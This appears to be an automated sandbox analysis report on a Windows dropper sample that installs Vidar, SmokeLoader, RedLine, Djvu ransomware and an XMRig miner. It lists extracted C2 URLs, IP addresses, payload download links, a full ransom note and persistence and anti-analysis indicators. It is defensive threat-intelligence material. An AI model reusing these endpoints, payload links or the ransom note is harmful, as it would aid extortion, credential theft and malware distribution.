Analysis
-
max time kernel
81s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
13-03-2022 09:00
Static task
static1
Behavioral task
behavioral1
Sample
f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe
Resource
win10v2004-en-20220113
General
-
Target
f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe
-
Size
3.7MB
-
MD5
4bd56f1559ed71cbe361a5eb98872ec7
-
SHA1
22eb1eac44baaac3bab313d35f7732aafb4e80a3
-
SHA256
f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d
-
SHA512
4928dd3e2b789ef14fea37c9fdae070a3516cf496d8b2cff8b90720c6de5315ad7df1a54564fa4986adeb1534300eaaa7ab998774a33c7e4fb8c2483c0c35e4c
Malware Config
Extracted
vidar
39.6
933
https://sslamlssa1.tumblr.com/
-
profile_id
933
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
Build2
45.142.213.135:30059
Extracted
redline
ruzkida
185.11.73.55:22201
-
auth_value
000938fe0d697ca6a3b6cee46ba02ff3
Extracted
redline
ruzki12_03
176.122.23.55:11768
-
auth_value
c51ddc8008e8581a01cec6e8291c5530
Extracted
djvu
http://fuyt.org/test3/get.php
-
extension
.xcbg
-
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
-
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn
Signatures
-
Detected Djvu ransomware 3 IoCs
Processes:
resource  yara_rule
behavioral2/memory/2132-357-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral2/memory/2132-363-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral2/memory/2132-364-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description  pid  pid_target  process  target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  1692  652  rUNdlL32.eXe
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
Processes:
resource  yara_rule
behavioral2/memory/1548-234-0x0000000000400000-0x000000000041E000-memory.dmp  family_redline
behavioral2/memory/5472-281-0x0000000000210000-0x0000000000384000-memory.dmp  family_redline
behavioral2/memory/5472-278-0x0000000000210000-0x0000000000384000-memory.dmp  family_redline
behavioral2/memory/5472-287-0x0000000000210000-0x0000000000384000-memory.dmp  family_redline
behavioral2/memory/5472-290-0x0000000000210000-0x0000000000384000-memory.dmp  family_redline
behavioral2/memory/5964-305-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
behavioral2/memory/2232-344-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Danabot Key Exchange Request
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
-
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource  yara_rule
behavioral2/memory/1504-213-0x0000000000A20000-0x0000000000ABD000-memory.dmp  family_vidar
behavioral2/memory/1504-214-0x0000000000400000-0x00000000008EC000-memory.dmp  family_vidar
-
XMRig Miner Payload 3 IoCs
Processes:
resource  yara_rule
behavioral2/memory/1344-252-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
behavioral2/memory/1344-253-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
behavioral2/memory/1344-254-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
-
Processes:
resource  yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe  aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe  aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurl.dll  aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurl.dll  aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurlpp.dll  aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurlpp.dll  aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libstdc++-6.dll  aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libstdc++-6.dll  aspack_v212_v242
-
Blocklisted process makes network request 2 IoCs
Processes:
flow  pid  process
280  5220  rundll32.exe
311  5680  rundll32.exe
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 52 IoCs
Processes:
pid  process
2504  setup_installer.exe
1680  setup_install.exe
1164  sahiba_7.exe
1272  sahiba_5.exe
4748  sahiba_8.exe
4756  sahiba_4.exe
4784  sahiba_1.exe
4792  sahiba_2.exe
1504  sahiba_3.exe
1912  sahiba_6.exe
308  sahiba_1.exe
256  Chrome2.exe
2104  jfiag3g_gg.exe
848  Install2.EXE
3464  BIRZAC~1.EXE
404  P1GlorySetp.exe
1780  jfiag3g_gg.exe
3336  BIRZAC~1.EXE
3584  system64.exe
1548  BIRZAC~1.EXE
2408  BUILD2~1.EXE
776  sihost64.exe
5312  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
5332  q7qe_a0ikJj9r1Tt_dSq8ad5.exe
5320  RTLIv59rgr2ywOZxYERl3i7d.exe
5344  5yfazEzcdUiOwhyVDRk6VI26.exe
5352  OdWkSXo7oi5oqr8oooXgrl2n.exe
5372  vuT2PIE6PhD4AILOarquXntr.exe
5384  vl8txTVy4WKIfcG7GdJi3UHD.exe
5400  ccvPZKnxQVnp6SMk85B2ULTz.exe
5408  DnSUr5m02PxtLbSxliYLhS_O.exe
5416  n8_CxLe71_GIr_omHI3emyQO.exe
5424  puFib_mN6HqGzK5uF14kFFxZ.exe
5472  ItMkYX_n_SCidLEm796l_vOZ.exe
5480  WerFault.exe
5572  9mwVCm19d9gWrQGu9nBZuWD8.exe
5596  RD6tmZH473Mxiy1QiSni4Ipw.exe
5604  aP3Zf8LTtQ0RxlWoO0vNq15I.exe
5628  fssUXsmjbrvldMR6Zvp75yT6.exe
5744  reg.exe
5788  IRqBjdGvO3HADSt6rUEhDsXS.exe
5796  F1_vMNmHEe9SnGkmIibX0lSm.exe
1968  Install.exe
5964  5yfazEzcdUiOwhyVDRk6VI26.exe
5368  bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe
4816  Install.exe
2132  aP3Zf8LTtQ0RxlWoO0vNq15I.exe
6412  dada.exe
6456  system64.exe
6540  build.exe
7016  iaghphix.exe
5552  Accostarmi.exe.pif
-
Modifies Windows Firewall 1 TTPs
-
Processes:
resource  yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe  upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe  upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe  upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe  upx
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description  ioc  process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Install.exe
-
Checks computer location settings 2 TTPs 17 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description  ioc  process
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  build.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  setup_installer.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  9mwVCm19d9gWrQGu9nBZuWD8.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  sihost64.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  system64.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  Install.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  RTLIv59rgr2ywOZxYERl3i7d.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  BUILD2~1.EXE
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  system64.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  q7qe_a0ikJj9r1Tt_dSq8ad5.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  n8_CxLe71_GIr_omHI3emyQO.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  sahiba_1.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  Chrome2.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  sahiba_6.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  RD6tmZH473Mxiy1QiSni4Ipw.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  sahiba_8.exe
-
Loads dropped DLL 39 IoCs
Processes:
pid  process
1680  setup_install.exe
1680  setup_install.exe
1680  setup_install.exe
1680  setup_install.exe
1680  setup_install.exe
4792  sahiba_2.exe
2208  rundll32.exe
5312  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
5408  DnSUr5m02PxtLbSxliYLhS_O.exe
5408  DnSUr5m02PxtLbSxliYLhS_O.exe
5312  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
5312  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
5408  DnSUr5m02PxtLbSxliYLhS_O.exe
5312  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
5408  DnSUr5m02PxtLbSxliYLhS_O.exe
5408  DnSUr5m02PxtLbSxliYLhS_O.exe
5408  DnSUr5m02PxtLbSxliYLhS_O.exe
5408  DnSUr5m02PxtLbSxliYLhS_O.exe
5312  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
5312  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
5312  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
5408  DnSUr5m02PxtLbSxliYLhS_O.exe
5312  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
5408  DnSUr5m02PxtLbSxliYLhS_O.exe
5312  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
5408  DnSUr5m02PxtLbSxliYLhS_O.exe
5312  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
5596  RD6tmZH473Mxiy1QiSni4Ipw.exe
5596  RD6tmZH473Mxiy1QiSni4Ipw.exe
6412  dada.exe
6412  dada.exe
6412  dada.exe
6412  dada.exe
6412  dada.exe
6412  dada.exe
6412  dada.exe
6412  dada.exe
6412  dada.exe
6412  dada.exe
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
description  ioc  process
Set value (str)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\n8_CxLe71_GIr_omHI3emyQO.exe"  n8_CxLe71_GIr_omHI3emyQO.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"  sahiba_7.exe
Key created  \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce  Install2.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""  Install2.EXE
Key created  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run  msedge.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
16  ipinfo.io
254  ipinfo.io
255  ipinfo.io
256  ipinfo.io
284  ipinfo.io
285  ipinfo.io
13  ip-api.com
15  ipinfo.io
-
Drops file in System32 directory 1 IoCs
Processes:
description  ioc  process
File created  C:\Windows\system32\GroupPolicy\gpt.ini  Install.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
pid  process
5472  ItMkYX_n_SCidLEm796l_vOZ.exe
-
Suspicious use of SetThreadContext 8 IoCs
Processes:
description  pid  process  target process
PID 3464 set thread context of 1548  3464  BIRZAC~1.EXE  BIRZAC~1.EXE
PID 3584 set thread context of 1344  3584  system64.exe  explorer.exe
PID 5344 set thread context of 5964  5344  5yfazEzcdUiOwhyVDRk6VI26.exe  5yfazEzcdUiOwhyVDRk6VI26.exe
PID 5480 set thread context of 2232  5480  WerFault.exe  AppLaunch.exe
PID 5604 set thread context of 2132  5604  aP3Zf8LTtQ0RxlWoO0vNq15I.exe  aP3Zf8LTtQ0RxlWoO0vNq15I.exe
PID 6456 set thread context of 464  6456  system64.exe  explorer.exe
PID 7016 set thread context of 6548  7016  iaghphix.exe  svchost.exe
PID 5424 set thread context of 5680  5424  puFib_mN6HqGzK5uF14kFFxZ.exe  rundll32.exe
-
Drops file in Program Files directory 23 IoCs
Processes:
description  ioc  process
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220313090038.pma  setup.exe
File opened for modification  C:\Program Files\Mozilla Firefox\install.log  rundll32.exe
File opened for modification  C:\Program Files\7-Zip\Lang\ga.txt  rundll32.exe
File opened for modification  C:\Program Files\Mozilla Firefox\Accessible.tlb  rundll32.exe
File opened for modification  C:\Program Files\Mozilla Firefox\api-ms-win-crt-private-l1-1-0.dll  rundll32.exe
File opened for modification  C:\Program Files\Mozilla Firefox\api-ms-win-crt-environment-l1-1-0.dll  rundll32.exe
File opened for modification  C:\Program Files\7-Zip\descript.ion  rundll32.exe
File opened for modification  C:\Program Files\7-Zip\Lang\el.txt  rundll32.exe
File created  C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\e7ec193e-95f7-4a80-835c-4d15524e77df.tmp  setup.exe
File opened for modification  C:\Program Files\7-Zip\Lang\ba.txt  rundll32.exe
File opened for modification  C:\Program Files\Mozilla Firefox\firefox.exe  rundll32.exe
File opened for modification  C:\Program Files\7-Zip\7z.exe  rundll32.exe
File opened for modification  C:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll  rundll32.exe
File opened for modification  C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png  rundll32.exe
File opened for modification  C:\Program Files\7-Zip\Lang\ar.txt  rundll32.exe
File opened for modification  C:\Program Files\7-Zip\Lang\is.txt  rundll32.exe
File opened for modification  C:\Program Files\7-Zip\7-zip.chm  rundll32.exe
File opened for modification  C:\Program Files\7-Zip\Lang\ext.txt  rundll32.exe
File opened for modification  C:\Program Files\Mozilla Firefox\IA2Marshal.dll  rundll32.exe
File opened for modification  C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll  rundll32.exe
File opened for modification  C:\Program Files\Mozilla Firefox\api-ms-win-crt-locale-l1-1-0.dll  rundll32.exe
File opened for modification  C:\Program Files\Mozilla Firefox\api-ms-win-core-processthreads-l1-1-1.dll  rundll32.exe
File opened for modification  C:\Program Files\7-Zip\Lang\he.txt  rundll32.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
Processes:
pid  pid_target  process  target process
3272  2208  WerFault.exe  rundll32.exe
4872  1504  WerFault.exe  sahiba_3.exe
3560  1344  WerFault.exe  explorer.exe
3940  1344  WerFault.exe  explorer.exe
5272  5352  WerFault.exe  OdWkSXo7oi5oqr8oooXgrl2n.exe
5812  5628  WerFault.exe  fssUXsmjbrvldMR6Zvp75yT6.exe
3420  5788  WerFault.exe  IRqBjdGvO3HADSt6rUEhDsXS.exe
3652  5320  WerFault.exe  RTLIv59rgr2ywOZxYERl3i7d.exe
5480  2132  WerFault.exe  aP3Zf8LTtQ0RxlWoO0vNq15I.exe
3060  5352  WerFault.exe  OdWkSXo7oi5oqr8oooXgrl2n.exe
1080  5788  WerFault.exe  IRqBjdGvO3HADSt6rUEhDsXS.exe
5740  5424  WerFault.exe  puFib_mN6HqGzK5uF14kFFxZ.exe
6560  5320  WerFault.exe  RTLIv59rgr2ywOZxYERl3i7d.exe
6676  5372  WerFault.exe  vuT2PIE6PhD4AILOarquXntr.exe
7064  5744  WerFault.exe  9HQpyhe09hiHI_EcwfONmvON.exe
6388  5320  WerFault.exe  RTLIv59rgr2ywOZxYERl3i7d.exe
5804  464  WerFault.exe  explorer.exe
5336  7016  WerFault.exe  iaghphix.exe
4844  5320  WerFault.exe  RTLIv59rgr2ywOZxYERl3i7d.exe
6692  464  WerFault.exe  explorer.exe
6604  5320  WerFault.exe  RTLIv59rgr2ywOZxYERl3i7d.exe
6208  5320  WerFault.exe  RTLIv59rgr2ywOZxYERl3i7d.exe
6200  5320  WerFault.exe  RTLIv59rgr2ywOZxYERl3i7d.exe
4080  5424  WerFault.exe  puFib_mN6HqGzK5uF14kFFxZ.exe
7040  5424  WerFault.exe  puFib_mN6HqGzK5uF14kFFxZ.exe
5728  5424  WerFault.exe  puFib_mN6HqGzK5uF14kFFxZ.exe
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description  ioc  process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  sahiba_2.exe
Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  sahiba_2.exe
Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  sahiba_2.exe
-
Checks processor information in registry 2 TTPs 57 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description  ioc  process
Key value enumerated  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1  puFib_mN6HqGzK5uF14kFFxZ.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  DnSUr5m02PxtLbSxliYLhS_O.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  rundll32.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor  puFib_mN6HqGzK5uF14kFFxZ.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  RD6tmZH473Mxiy1QiSni4Ipw.exe
Key value enumerated  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier  rundll32.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz  rundll32.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0  bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status  rundll32.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  GGZuKAvlVgsiOJtG4ZvHBMf8.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data  rundll32.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  RD6tmZH473Mxiy1QiSni4Ipw.exe
Key enumerated  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value enumerated  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  rundll32.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value enumerated  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  rundll32.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  DnSUr5m02PxtLbSxliYLhS_O.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet  puFib_mN6HqGzK5uF14kFFxZ.exe
Key enumerated  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision  rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  puFib_mN6HqGzK5uF14kFFxZ.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet  rundll32.exe
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid  process
4084  schtasks.exe
4128  schtasks.exe
6816  schtasks.exe
6652  schtasks.exe
6004  schtasks.exe
-
Delays execution with timeout.exe 1 IoCs
Processes:
pid  process
6276  timeout.exe
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
pid  process
768  tasklist.exe
5828  tasklist.exe
-
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
description  ioc  process
